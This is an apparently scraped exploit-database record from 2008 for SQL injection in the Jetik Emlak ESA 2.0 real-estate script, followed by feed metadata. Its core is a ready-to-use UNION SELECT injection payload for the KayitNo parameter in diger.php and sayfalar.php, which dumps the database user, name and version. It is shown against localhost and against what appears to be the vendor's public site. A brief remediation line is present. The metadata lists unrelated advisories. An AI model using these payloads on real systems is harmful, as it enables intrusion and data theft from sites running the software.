ID 1337DAY-ID-3740
Type zdt
Reporter ZoRLu
Modified 2008-09-24T00:00:00
Description
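Exploit for unknown platform in category web applications (feed-generated summary: the record lists no CVE, and its CVSS score of 0.0 with vector NONE means the issue is unscored, not that it is low severity)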
=================================================================
Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities
=================================================================
[~] Jetik Emlak ESA 2.0 System Script
[~]
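[~] (KayitNo) multiple remote SQL injection
[~] The KayitNo request parameter is injectable in both diger.php and sayfalar.php. It appears to be a numeric record id, so validating it as an integer or binding it in a parameterized query addresses both scripts.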
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 24.09.2008
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script_path/diger.php?KayitNo=[SQL]
http://localhost/script_path/sayfalar.php?KayitNo=[SQL]
[SQL]=
-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
Example:
http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
Example 2:
http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
{"published": "2008-09-24T00:00:00", "id": "1337DAY-ID-3740", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-01-04T11:05:08", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310882957", "OPENVAS:1361412562311220171105"]}, {"type": "mskb", "idList": ["KB4462143", "KB4484098"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2019-0100_SAMBA4.NASL", "ORACLELINUX_ELSA-2018-2846.NASL", "NEWSTART_CGSL_NS-SA-2019-0096_SAMBA.NASL", "SUSE_SU-2019-0645-1.NASL", "PHOTONOS_PHSA-2018-1_0-0180_LINUX.NASL", "REDHAT-RHSA-2018-2846.NASL", "REDHAT-RHSA-2018-3459.NASL", "REDHAT-RHSA-2018-2925.NASL", "CENTOS_RHSA-2018-2846.NASL", "SL_20181009_KERNEL_ON_SL6_X.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:46941"]}, {"type": "zdt", "idList": ["1337DAY-ID-32820"]}, {"type": "redhat", "idList": ["RHSA-2018:2846", "RHSA-2018:3459", "RHSA-2018:2925"]}, {"type": "centos", "idList": ["CESA-2018:2846"]}], "modified": "2018-01-04T11:05:08", "rev": 2}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-01-04T11:05:08", "edition": 2, "title": "Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities", "href": "https://0day.today/exploit/description/3740", "modified": "2008-09-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/3740", "references": [], "reporter": "ZoRLu", "sourceData": "=================================================================\r\nJetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities\r\n=================================================================\r\n\r\n\r\n\r\n[~] Jetik Emlak ESA 2.0 System Script\r\n[~]\r\n[~] (KayitNo) multiple remote sql inj\r\n[~]\r\n[~] ----------------------------------------------------------\r\n[~] Discovered By: ZoRLu\r\n[~]\r\n[~] Date: 
24.09.2008\r\n[~]\r\n[~] -----------------------------------------------------------\r\n\r\nExploit:\r\n\r\nhttp://localhost/script_path/diger.php?KayitNo=[SQL]\r\n\r\nhttp://localhost/script_path/sayfalar.php?KayitNo=[SQL]\r\n\r\n[SQL]= \r\n\r\n-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample:\r\n\r\nhttp://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample 2:\r\n\r\nhttp://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #"}